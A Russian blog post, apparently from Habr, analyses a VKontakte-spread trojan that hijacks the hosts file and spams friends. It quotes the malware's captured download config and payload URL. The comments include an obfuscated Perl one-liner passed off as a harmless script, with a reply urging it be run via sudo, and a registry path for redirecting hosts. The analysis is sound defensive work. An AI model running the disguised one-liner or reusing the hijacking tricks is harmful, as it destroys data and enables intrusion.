«Гости на моей страничке» Очередной вредоносный спам вконтакте

    Здравствуйте. Не так давно я писал про рассылку зловредов по социальной сети «Вконтакте». Не так давно встретился новый, в общем-то похожий случай…
    Кинули мне на анализ некий файлик VKGuests.exe, который должен показать кто посещает страничку вконтакте. Скачан файл был с сайта vko-blog.ru, ссылка на который пришла от друга. Жалоба была на то, что «пропал интернет». Любопытно. Ковыряем.




    Прежде чем соваться к файлу, было бы интересно почитать, что пишут на том сайте.
    Видим классическую замануху об «уникальности нашей программы» от якобы Павла Дурова.
    Все ясно) В самом низу синяя кнопка «Установить счетчик», при нажатии на которую, собственно, и предлагается скачать VKGuests.exe.
    Файл представляет из себя PE-бинарник, весом в 2 230 040 байт, защищен DotFix NicеProtect.
    На момент проверки детектировался на virustotal 12/42

    Пробуем запустить, нас встречает симпатичного вида окно, рекомендующее закрыть все браузеры для стопроцентной работы этого «счетчика». Закрываем браузер, нажимаем OK. Открывается не менее красивое окно с полями для ввода логина/пароля учетки вконтакте.





    Берем в руки сниффер, вводим данные от балды. При вводе логина не в виде электронного ящика — ссылается на ошибку. Попробуем изобразить почту, к примеру 1111@mail.ru, пароль должен быть не короче 6 символов.

    Сниффер поймал коннект с адресом 91.193.194.113, который никак не относится к уютному контактику.
    Содержимое сесии:
    GET /stat/config.txt HTTP/1.1
    Host: sjhgjjd.ru
    Accept: text/html, */*
    Accept-Encoding: gzip,deflate, identity
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3

    HTTP/1.1 200 OK
    Date: Thu, 05 May 2011 16:22:10 GMT
    Server: Apache/2
    Last-Modified: Sun, 01 May 2011 10:42:57 GMT
    ETag: «5c01b-b4-4a23491ebee40»
    Accept-Ranges: bytes
    Vary: Accept-Encoding,User-Agent
    Content-Encoding: gzip
    Content-Length: 158
    Content-Type: text/plain

    «timeout»:«0»
    «photo_url»:«hxxp://cs10358.vkontakte.ru/u7041153/133719745/x_07e5f13b.jpg»
    «file_url»:«hxxp://sjhgjjd.ru/install_msi.exe»
    «ac_key»:«15f8a3de833b23fd150188ddd3d1f9d7»

    Аха, выдаются для скачивания любопытные вещи: ссылка на странный файл с непонятного адреса, ссылка на картинку с кратким содержанием того блога, о котором говорилось вначале и ключ от сервиса антикапчи, используемый для спама/флуда систем, защищенных капчей. Ну, я подобным я как-то сталкивался. Закрываем VKGuests.exe к чертям и скачиваем файл по ссылке самостоятельно.

    Перед нами сжатый с помощью UPX файл install_msi.exe, весом в 179 200 байт. Снимаем UPX, и предстает перед нами исполняемый, скомпилированный в PureBasic, весом 198 656 байт.
    К сожалению, сегодня ночью вирустотал сильно перегружен, поэтому они морозят мои отчеты уже несколько часов, из-за чего по началу проверка может быть недоступна.
    Продублировал на jotty, там рузультат вообще 2/20 для сжатого и 1/20 для несжатого файлов.


    Едем далее — глядим ресурсы подопытного, где обнаруживаем, конечно же, обфусцированный батник, меняющий хостс-файл.



    При обращении к заблокированным сайтам нам предложат заплатить через терминал Qiwi денег на счета вебмани:



    В общем-то для лечения стоит только удалить оба файла hosts из c:\windows\system32\drivers\etc\ (один из них будет скрыт, в другом одна буква — не латинская.

    Но что будет, если бы мы ввели реальные данные в самом начале эксперимента?
    Вводим правильные данные, программа начинает активно скачивать из сети «недостающие компоненты», которые были описаны выше.







    Затем долго «думает», рассылая спам, и перезагружает компьютер.
    Я уже говорил, что этот вредоносный пакет получает ключ для антикапчи, так вот он используется для массового отмечания всех друзей на фото, добавленного в профиль той учетки, данные которой были введены. Не исключено, что логин и пароль, переданные на сервер точно так же, автоматически, будут использоваться для дальнейшего спама.

    Вирус не резидентный, поэтому после перезагрузки он не только не продолжает работу, но еще и удаляется из системы, прихватывая за собой все барахло, которое было скачано. Ну, кроме подмененного hosts =)

    Собственно все. Более ничего интересного из этого зловреда выжать не удалось, да и не хотелось.

    Similar posts

    Ads
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More

    Comments 136

    • UFO just landed and posted this here
        +46
        «К черту анивирус!» говорят те люди, которые знают, что да как в этих ваших интернетах. Остальным он крайне рекомендуется.
          +4
          Просто антивирусом (а против данного зловреда больше помог был файрвол), тоже надо уметь пользоваться, а не банально разрешать всё, как делает большинство, что называется, «домохозяек». Если вручную давать всему доступ — в подобном ПО вообще нет смысла.
            +13
            -А что, эта машина ваша, есть у неё защита от дурака?
            -Да. Но только не от руководящего.

            Кажется из Стругацких.
            –19
            Я даже залогинился специально, чтобы плюсануть твой коммент.
              +1
              немного холивара. Ubuntu — к черту антивирусы.
                0
                Я люблю поиграть в игры.
                А Убунту я использовал когда не любил игры. Так то.
                  0
                  А я почему-то стал играть в различные игры, только когда перешёл на Ubuntu. А в Windows в игры уже много лет не играл.
                    +1
                    Когда я болел World of Warcraft, я попробовалл его запустить его под wine. На одной и той же машине. Не могу объяснить как и почему, но под wine он работал шустрее, можно было настройки выше ставить. Не знаю как с другими играми.
                +4
                Удивляюсь почему проактивка всех антивирусов давно не блокирует запись в hosts.
                Сделать ведь просто.
                Такую тему закрыли бы…
                *А то раз в неделю про такой спам.
                  0
                  Касперский по дефолту блокирует. При чем, довольно активно. Чтобы разрешить Notepad'y доступ к hosts — пришлось создать спец. правило :)

                  Так что за все антивирусы — не говорите ;)
                    +2
                    Запись в hosts и без того заблокирована UAC.
                    Если на UAC нажато да, у вредоносного кода есть права админа и пить боржоми уже поздно.
                      0
                      rw в hosts нередко нужен, например Denver меняет его при каждом пуске-стопе. Кому hosts не нужен или опасен, можно закрыть его правилами NTFS от записи и/или чтения да и вся недолга. Нужные хосты можно всегда прописать на локальном DNS-сервере. Ну и как уже сказано UAC в W7 конечно тоже рулит.
                  • UFO just landed and posted this here
                      +3
                      Ну могли бы так не изгаляться. Примерно неделю назад мне постучался товарищ в панике. Говорит о ужас! Контакт заблокировали у него на пк. Спросил, что же он делал перед этим. А причина очень даже банальна. Пришло письмо с просьбой скачать *.exe. Ну он любезно скачал, проверил на антивирусе и любопытство взяло свое :) Запустил… А как было тяжело ему объяснить как вытащить hosts в блокнот. Ибо старый хостс стал скрытый а появился новый hюsts. Странное название они придумали для липового файла. Могли бы «o» заменить «о» кириллицей, например…
                        +14
                        Ибо старый хостс стал скрытый а появился новый hюsts. Странное название они придумали для липового файла. Могли бы «o» заменить «о» кириллицей, например…
                        Могли бы просто изменить путь к используемому систмеой файлу hosts в реестре:
                        HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\DataBasePath
                          0
                          Ну в принципе тоже вариант, но тут уже может и антивирус это увидеть. Хотя…
                            +2
                            Спасибо, не знал, теперь буду и там искать при лечении знакомых =)
                              +5
                              «Спасибо, не знал, теперь там буду менять при написании вирусов» %)
                                +1
                                Я теперь просто даю ссылку: habrahabr.ru/blogs/personal/73219/
                                0
                                А мифы снова процветают. Вы сначала попробуйте, а потом пишите, т. к. этот параметр не работает.
                                  0
                                  Чтобы не повторяться, читайте тут и ниже.
                                    0
                                    Никаких мифов. В Windows XP это действительно работает. Проверено.
                                    И об этом, кстати, написано и в официальных статьях Microsoft:
                                    support.microsoft.com/kb/314053/en
                                    support.microsoft.com/kb/314053/ru
                                    Только, чтобы изменения вступили в силу, нужно перезагрузить систему.
                                      0
                                      Можно поинтересоваться, вы лично это проверяли? Если да — напишите каким образом повторить ваш успешный эксперимент, потому что у меня он не работает.
                                        0
                                        Как снова доберусь до WinXP, постараюсь ещё раз проверить и написать.
                                +7
                                Как бы это не было печально, но офисный и домашний планктон никогда не поумнеет. Таковы законы природы…
                                  +9
                                  Это, наоборот, очень и очень позитивно! Пока существуют ламеры, у людей шарящих всегда будет работа.

                                  Простите за грубый французский:
                                  «Скупой платит дважды, а лох — по жизни»©
                                    +2
                                    Вставлю свои 5 копеек: «Лох не мамонт — весь не вымрет». Печально, в общем, сколько лет одно и то же происходит.
                                    • UFO just landed and posted this here
                                        +1
                                        Более того, мы все лохи как минимум в нескольких областях. Так никто и не корчит из себя гуру — просто фраза то вселенская^Wдостаточно всеобъемлющая ;)
                                          0
                                          настоящие лохи — это те, кто лохи во всем.
                                        0
                                        Можно посмотреть и иначе — пока существуют люди, обмануть которых достаточно просто, никто не будет городить несусветно сложных схем. А простые мы расколем и так.
                                      +13
                                      Тоже недавно у знакомой лечил подобное. Открываю hosts а там вроде как пусто, но размер его 143 Кб =) Думаю что что-то не то. Открываю снова, нажимаю Ctrl+A и вижу что там пустые строки и пробелами сдвинуто лишенее =) Хитрые =) Отчистил, удалил зловредную софтину.
                                      А дома у меня антивируса нет ибо «Нет Windows — нет антивируса». Линуксом пользуюсь.
                                        0
                                        Замечу что данный зловред скорее всего еще и на mail.ru по тому чего получил подолбиться попробует. и там спама наворотит =)
                                          +9
                                          И под Windows можно не пользоваться антивирусом, если не качаешь подобных троянов, постоянно не вставляешь флешки с авторанерами, не качаешь пиратский софт. Я так сидел около 2-х лет под WinXP, а под Windows 7 будет еще проще.
                                            +1
                                            + своевременно ставишь апдейты и не работаешь под админом (в большей степени справедливо для WinXP).
                                              +1
                                              Сижу на XP SP2, антивирусом и файрволом не пользуюсь, обновления не ставлю, к Интернету подключен постоянно, пользуюсь варезом, а вирусов все нет и нет. Что я делаю не так?
                                                0
                                                Это всего лишь значит, что ты их не видишь :-))
                                                  0
                                                  CureIt тоже их не видит.
                                                    0
                                                    По моему, уже лет пять назад было так, что если хороший зловред хорошо укрепился в систему, то его никто и ничто не увидит.

                                                    Так что неудивительно.
                                                      0
                                                      Запускаете под этой же виндой? Если да, то и не увидит.
                                                        0
                                                        Вирус так хорошо укрепился, что даже не виден при запуске CureIt из ERD Commander.
                                                          0
                                                          Слепая вера в абсолютные возможности CureIt и прочих подобных средств разовой проверки ничем не оправдана. Толково написанный руткит единожды пропустив в систему навряд ли получится вычистить.
                                                +1
                                                Linux это правильно.

                                                  +17
                                                  Кстати помогите, пожалуйста исправить такую программу:

                                                  cat «test… test… test...» | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

                                                  — не печатает
                                                    +14
                                                    Да нет, всё печатает.
                                                    Попробуйте её запустить через sudo, может так у вас получится.
                                                      0
                                                      «Нубы должны страдать»? :-)
                                                • UFO just landed and posted this here
                                                    +21
                                                    Вы себе даже не представляете, сколько еще таких людей…
                                                      +11
                                                      Троян составляет готовые расстрельные списки для сторонников Евгеники.
                                                    • UFO just landed and posted this here
                                                        0
                                                        Рейтин кстати отменили =)
                                                          +13
                                                          Это только на руку вредителям. Будет очередная замануха для лохов — заплати 100 рублей и включи себе рейтинг
                                                            +1
                                                            Ну зачем же вы подсказываете то им..? =)
                                                            +1
                                                            А лохи всё равно будут вестись :)
                                                            Или как вариант — возвращение полоски рейтинга и быть первым во всех поисках.
                                                          +4
                                                          Чем только не занимаются школьники, лишь бы не делать уроки
                                                            0
                                                            В СНГ ещё есть люди верящие в золотой значок айсикью!
                                                              +2
                                                              Конечно, ведь чтобы получить золотой значок, нужно стать Королем Аськи!
                                                            +5
                                                            Пока будут люди, желающие «рамочку», будут и люди, которые на этом заработают. Люди все так же верят гадалкам, ведуньям и прочим. А есть ли эта рамочка вообще, или нет — не так уж важно. Культура и образованность же!
                                                              0
                                                              А не было бы у юзеров, сидящих «из-под админа» в винде прав на запись в hosts, уже полегчало бы.
                                                              Сделать же такое не сложно.
                                                                +1
                                                                Это уже давно сделано. Но многие еще сидят на XP десятилетней давности.
                                                                  +5
                                                                  Хах, да я ради таких функций проигнорирую предупреждение UAC, безопасность ничто в сравнении с ЗНАНИЯМИ
                                                                  0
                                                                  Мда, весело. Удивительно, что на это ещё кто-то ведется, кроме новичков.
                                                                    +1
                                                                    Новички подрастают и проявляются каждый новый день.
                                                                      0
                                                                      Ага, новички подрастают, головы растут, а вот полезный объем у них не изменяется, так что концентрация мозгов становится всё меньше.
                                                                    –32
                                                                    Все, это было последней каплей. Удалю страницу.
                                                                      +16
                                                                      > Удалю страницу
                                                                      Ха-ха, насмешил.
                                                                        –10
                                                                        Поржал? Молодец!
                                                                        Тем не менее, удалил, как и обещал.
                                                                        Надеялся на минусы в карму, а вы рейтинг даже занулить не смогли.
                                                                          +2
                                                                          > Тем не менее, удалил, как и обещал.

                                                                          Наивный. Ничего на самом деле не удалилось и по прямым ссылкам по-прежнему доступно.
                                                                        0
                                                                        поздняк метаться!
                                                                        0
                                                                        Рецепт счастья прост: Nix-based система (Linux/MacOS/BSD) + не юзать вконтакте?
                                                                          +5
                                                                          Что помешает вместо .exe файла впулить deb пакет и попросить ввести пароль?
                                                                            +1
                                                                            ввести пароль рута?)
                                                                              +10
                                                                              Обычно пакеты ставятся из репозитариев, довольно редко когда сторонние. Но я понял, к чему вы клоните. Мозг необходим при использовании любой ОС :-)
                                                                                +1
                                                                                Мозг нужен, безусловно, но пока работают балканские вирусы «скопируйте этот код и вставьте в строку ввода адреса в браузере» рассчитывать на его наличие не стоит.
                                                                              +3
                                                                              Как только nix-based системы широко распространятся среди новичков, появятся вирусы и для них. Например «установите обновление для Flash-player, чтобы посмотреть это видео». А по ссылке — sh, выкачивающий rpm/deb под вашу систему. И ведь будут вводить пароль рута, это уж как водится.
                                                                                +2
                                                                                Я всё не понимаю зачем так сложно. Скачивается просто бинарник/файл на скриптовом языке в ~ или /tmp и запускается. Не нужны пароль рута и иже с ними.
                                                                                  0
                                                                                  Если для того, чтобы потырить логины/пароли или разослать спам ВКонтакте — то да, этого вполне достаточно.
                                                                                  Пароль рута же нужен для создания ботнетов, кейлоггеров и прочих схожих шалостей.
                                                                                    +1
                                                                                    Кейлоггер — да, для ботнета зачем рут?
                                                                                      0
                                                                                      Чтобы бороться с антивирусами, разумеется. (Под Макось уже есть антивирусы, например)
                                                                                        0
                                                                                        Их ставит такой небольшой процент пользователей, что палиться и спрашивать пароль рута смысла нет.
                                                                                          0
                                                                                          Я рассуждаю о том времени, когда nix системы будут иметь свой весомый процент, а значит будут привлекательны для вирусописательства. Как только это случится, процент антивирусов вырастет.
                                                                                          И да, можно же не палиться, и запрашивать пароль рута, только если антивирус есть.
                                                                                    +1
                                                                                    Скаченный файл не будет исполняемым. Надо еще «объяснить» пользователю как его сделать исполняемым и запустить.
                                                                                      0
                                                                                      Есть zip-архивы с автозапуском файла.
                                                                                      • UFO just landed and posted this here
                                                                                          +1
                                                                                          Я не в курсе, а что там? jar автозапускается на всех системах или что?
                                                                                          • UFO just landed and posted this here
                                                                                              +1
                                                                                              Могут быть использованы так называемые drive-by атаки на браузер. Возможно, не совсем верно выразился, но я сталкивался с подобным. При переходе на сайт производится попытка запустить ява-апплет. Под виндой загрузка ява апплета включала видео-ролик, а на фоне скачивала и запускала трояна.
                                                                                              На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
                                                                                        0
                                                                                        От такого троянца легко защититься. У меня /tmp, /home, /var монтируются с ключом noexec, и скачанные программы случайно запустить невозможно в принципе.
                                                                                        Но если запустить очень хочется, то придется делать много телодвижений: перезаходить рутом, копировать в /usr/local/bin, ставить право запуска — и только тогда можно запускать. Случайно такую последовательность не исполнишь.
                                                                                          0
                                                                                          Так вы и не будете являться целью такой атаки, ею будут являться простые пользователи, которые покорно выполнят все инструкции по запуску трояна.
                                                                                            0
                                                                                            Я думаю, что простые пользователи устанавливать Linux позовут знающего человека, который настроит им права по-уму. Тогда троянца запустить будет столь же непросто, как и в приведенном мной примере.
                                                                                        0
                                                                                        Позволю себе поправку: не «как только», а «если» всё-таки. Тенденций подобных пока не намечается.
                                                                                          0
                                                                                          Доля МакОСи неплохо растет.
                                                                                            0
                                                                                            Да, вы правы. Постоянно забываю, что за её внешностью она nix-based. ^_^
                                                                                      +5
                                                                                      «Установка полноСью завершена!»
                                                                                      Спешили видимо :)
                                                                                        0
                                                                                        Ага и «настРоятельно просим»
                                                                                          0
                                                                                          И еще «без всяких помех»
                                                                                        +6
                                                                                        Интересно, ключ на антикапчу ещё живой?
                                                                                        +9
                                                                                        Спасибо! Сейчас имено так и попробую сделать у себя Ubuntu. Довольно красивый выход в случае с DropBox.
                                                                                          +6
                                                                                          Извиняюсь! Не в ту тему описал :(
                                                                                            +13
                                                                                            Хорошо что акк/пасс туда вбили! ;)
                                                                                          +2
                                                                                          Мне кажется правильнее было бы отправить его разработчикам антивирусов. Тогда об этом об этом вирусе узнали бы не только читатели хабра но и все пользователи этих антивирусов.
                                                                                            0
                                                                                            В чем смысл поста-то? В том, что не нужно ходить на левые сайты, шифрующиеся под ВКонтакте или самому запускать хрень, которая одарит вас мега-фичей? Бред какой-то честное слово.
                                                                                              +2
                                                                                              Спасибо за ключик от антикапчи :)
                                                                                                0
                                                                                                Надо быть полным дураком, чтобы видеть адресную строку и продолжать вводить свои данные. В данном случае, всё наглядно видно.

                                                                                                P.S.: «Нет ещё даже на Facebook» — порадовало.
                                                                                                  –1
                                                                                                  Эх, такую контору спалили :-)
                                                                                                    –4
                                                                                                    Тут конечно можно сказать ппару нелицеприятных слов про ОС, которые позволяют запустить с полными правами любой скачанный из интернета файл. Но зачем о плохом, давайте лучше о хорошем.

                                                                                                    А радует в этой ситуации то, что имеется большое число людей, которые легко разводятся подобными примитивными приемами. Ведь любому разработчику могут понадобиться аккаунты вконтакте, а с введением всех этих дурацких подтверждений их нигде не достать, даже за деньги, (в пределах разумного), и администрация их вроде не продает. Так что я вполне понимаю авторов программы. Дуров сам виноват, нечего было закрывать регистрацию.
                                                                                                      +2
                                                                                                      Тут нужно писать нелицеприятные слова не про ОС, а про прокладку между креслом и клавиатурой. У меня дома на компе основной ОСь стоит винда, и я постоянно лажу по этим вышим интернетам, пользуюсь его ресурсами, и знаете, у меня за всю жизнь еще ни разу не появилось ни одного порнобаннера, ни «взлома моего аккаунта вконтакте», и ничего прочего из этой оперы. И да, антивируса у меня нет, Хотя периодически выполняю полную проверку кампутера каким нибудь антивирем, типа CureIt.

                                                                                                      вывод: во всех проблемах с утечкой паролей, завирусованностью компьютеров, и т.д., как уже было озвучено ранее, виновата прокладка между клавиатурой и креслом.
                                                                                                        0
                                                                                                        > вывод: во всех проблемах с утечкой паролей, завирусованностью компьютеров, и т.д., как уже было озвучено ранее, виновата прокладка между клавиатурой и креслом.

                                                                                                        Вы не правы. Сегодня компьютер — не университетский монстр, которым пользуются молодые ученые для расчетов, а массовый инстреумент для работы и развлечения. Значит, им пользуются десятки миллионов людей (и в ближайшем будущем к ним добавятся сотни миллионов из развивающихся стран).

                                                                                                        Вы предлагаете заставить всех их потратить миллиарды часов человеческих жизней на заучивание дебильных правил поведения в криво написанной операционной системе? Вам не кажется, что честнее, справедливее и выгоднее для мировой экономики напрячь несколько сотен программистов, чтобы они уже исправили свои ошибки и написали нормальную ОС?

                                                                                                        Компаниям нужна безопасная, надежная, производительная рабочая среда. Людям нужен надежный. не ломающийся и не требующий денег (либо производителям не работабщих антивирусов, либо вымогателям) инструмент для развлечений с простым и понятным интерфейсом, без драйверов, реестров, sudo apt-get install и прочей магии. Заумные абстракции и интерфейсы никому не нужны. А вы со своими ретроградскими взглядами, может тогда всех пересадим на телетайпы назад?

                                                                                                        Смешно читать сентенции про «прокладки между креслом и клавиатурой». Когда в заболеете, вы наверно окажетесь прокладкой между операционным столом и скальпелем? Хотя, почему их любят повторять на Хабре, понятно — ведь некоторым людям кроме сомнительной ценности знаний, как ставить кривые драйвера через правку реестра, и похвастаться то больше нечем, чтобы поставить себя выше остальных.
                                                                                                          0
                                                                                                          Сегодня автомобили — не роскошь, а средство передвижения, значит ими пользуются десятки миллионов людей, и с каждым разом число автомобилистов растет.

                                                                                                          Вы предлагаете заставить тех, кто присоединяется к числу автомобилистов потратить миллиарды часов человеческих жизней на заучивание дебильных правил дорожного движения, практикуясь на кривых отечественных автомобилях? Может собрать несколько сотен толковых инженеров, и дизайнеров, чтобы они исправили ошибки всех остальных инженеров и дизайнеров, и спроектировали нормальный автомобиль?

                                                                                                          Компаниям и людям нужен безопасный, надежный, мощный, дешевый в обслуживании, не требующий больших вложений автомобиль для развлечений и передвижения, с простым и понятным управлением безо всяких заморочек с переключением скоростей, сигналок, каких то непонятных зажиганий, безо всяких правил, заправок, и другого обслуживания. Заумные ПДД, и знание законов никому не нужно. А вы со своими ретроградскими взглядами, может тогда всех пересадим на велосипеды назад?

                                                                                                          >Смешно читать сентенции про «прокладки между креслом и
                                                                                                          > клавиатурой». Когда в заболеете, вы наверно окажетесь прокладкой
                                                                                                          > между операционным столом и скальпелем? Хотя, почему их любят
                                                                                                          > повторять на Хабре, понятно — ведь некоторым людям кроме
                                                                                                          > сомнительной ценности знаний, как ставить кривые драйвера через
                                                                                                          > правку реестра, и похвастаться то больше нечем, чтобы поставить себя
                                                                                                          > выше остальных.

                                                                                                          Не сравнивайте одно с другим. Во-первых, чтобы оказаться на операционном столе, Вам должно крупно не повезти, а во вторых, в хирургии работаю профессионалы своего дела, которые дипломы, и прочие сведения об образовании явно не покупали, а честно учились, честно нарабатывали опыт, и т.д.
                                                                                                            0
                                                                                                            >а во вторых, в хирургии работаю профессионалы своего дела, которые дипломы, и прочие сведения об образовании явно не покупали, а честно учились, честно нарабатывали опыт

                                                                                                            Приезжай в Россию и сходи в больницу. Твоё мнение резко изменится.
                                                                                                              0
                                                                                                              я живу в России
                                                                                                              0
                                                                                                              Неуклюже. Дополнительная аттестация на право управления автомобилем нужна только из-за того, что он является средством повышенной опасности. Компьютер таким средством не является.
                                                                                                                0
                                                                                                                смысл тот же
                                                                                                          0
                                                                                                          Тут конечно можно сказать ппару нелицеприятных слов про ОС, которые позволяют запустить с полными правами любой скачанный из интернета файл
                                                                                                          А что, вы хотите чтобы это было вообще нельзя?
                                                                                                            0
                                                                                                            Да, хочу. Ну если и можно запустить, то либо а) с цифровой подписью от разработчиков дистрибутива (которые ее кому попало не дадут) либо б) скачав руками, распаковав, сменив права доступа, переместив куда-нибудь в /Programs/Other, и только из консоли.
                                                                                                          +1
                                                                                                          Почему-то вспомнился «король аськи» из +100500…
                                                                                                            +2
                                                                                                            Там, кста, не PureBasic, а Quick Batch Compiler.
                                                                                                              0
                                                                                                              У меня были подозрения, что используется какой-то конвертер, вроде bat 2 exe и прочих, но руки перепробовать все пока что не дошли.
                                                                                                                0
                                                                                                                У bat2exe внутри исполняемый файл есть и строчка b2e.exe или b2e.dll.
                                                                                                                0
                                                                                                                Если бы использовали PB, то в чем смысл фигачить батник? Это же идиотизм.
                                                                                                                Как был вообще определен PB? По-моему он ничем мне известным точно не определяется.
                                                                                                                  0
                                                                                                                  И не такое бывает: завернут в bat2exe, или тот же QBC батник, который дропает vbs, который, например, дропает EXE. Был бы у меня под рукой PureBasic — я бы сказал, как он определяется.
                                                                                                                    0
                                                                                                                    peid, exe info pe вроде бы, нету сейчас возможности проверить.
                                                                                                                    Вполне возможно, что это фальшивая сигнатура.
                                                                                                                      0
                                                                                                                      ни один из моих разнообразнейших экзешников, собранных в версиях пб от 4.0 до 4.51 не определяется в peid последней версии
                                                                                                                      а вот за exeinfo спасибо, про него не знал — в нем как раз определяется, только версия не та
                                                                                                                  +2
                                                                                                                  That's why we can't have nice things. Кто-нибудь может объяснить, почему этим людям может понадобиться такое? Неужели у людей нет целей и занятий поинтереснее, что их так интересует, кто заходил к ним на страничку, кто поставил им единицу за фотку, какая у них рамочка вокруг аватарки. Прямо какая-то эпоха королей аськи.
                                                                                                                  Моё мнение: так им и надо. Своего рода естественный отбор.
                                                                                                                    0
                                                                                                                    Меня вот больше интересует почему нет занятий поинтересней у программистов, создающих это. А то, что есть те кого интересуют аватарки с машиной внизу и крутым рэпером и прочие красоты это факт, далеко ходить не надо, у меня двоюродная родня в друзьях есть (как же откажешь родным если стучатся в друзья), мелкие еще да из деревень сами по себе. Вот у них на страницах кишит всё подобными штуками, и ведь качают и устанавливают.
                                                                                                                      0
                                                                                                                      Думаю скорее дело в доходах, чем в спортивном интересе.
                                                                                                                    +1
                                                                                                                    Мыслите позитивно.
                                                                                                                    Ключ на антикапчу. На халяву!
                                                                                                                      +2
                                                                                                                      Такими постами вы нарушаете естественный отбор.
                                                                                                                        +1
                                                                                                                        Теперь осталось написать жалобу, чтобы данный сайт забанили у хостера :)

                                                                                                                        inetnum: 91.193.192.0 — 91.193.195.255
                                                                                                                        netname: OD-HOSTING-NETWORK
                                                                                                                        descr: Odessa Hosting Service
                                                                                                                        country: LV
                                                                                                                        org: ORG-UTS3-RIPE
                                                                                                                        admin-c: JS1050
                                                                                                                        tech-c: JS1050
                                                                                                                        status: ASSIGNED PI
                                                                                                                        mnt-by: GENERALSERVICE-MNT
                                                                                                                        mnt-by: RIPE-NCC-HM-PI-MNT
                                                                                                                        mnt-lower: RIPE-NCC-HM-PI-MNT
                                                                                                                        mnt-routes: GENERALSERVICE-MNT
                                                                                                                        mnt-domains: GENERALSERVICE-MNT
                                                                                                                        source: RIPE # Filtered
                                                                                                                          –1
                                                                                                                          [капитан_моде=он]
                                                                                                                          Судя по адресу из photo_url — это вот этот индивидуум vkontakte.ru/id7041153
                                                                                                                          [капитан_моде=офф]
                                                                                                                            0
                                                                                                                            Это одна из жертв вируса.
                                                                                                                              +1
                                                                                                                              Из текста топика это никак не выводилось. Если так — прошу извинить.
                                                                                                                            +1
                                                                                                                            [сарказм]И эту фичу у фейсбука стырили[/сарказм]
                                                                                                                              0
                                                                                                                              image

                                                                                                                              Вроде как опечатки в окне установщика уже должны наводить на некоторые мысли.

                                                                                                                              Хотя, в слове "Настроятельно" что-то есть.

                                                                                                                              Only users with full accounts can post comments. Log in, please.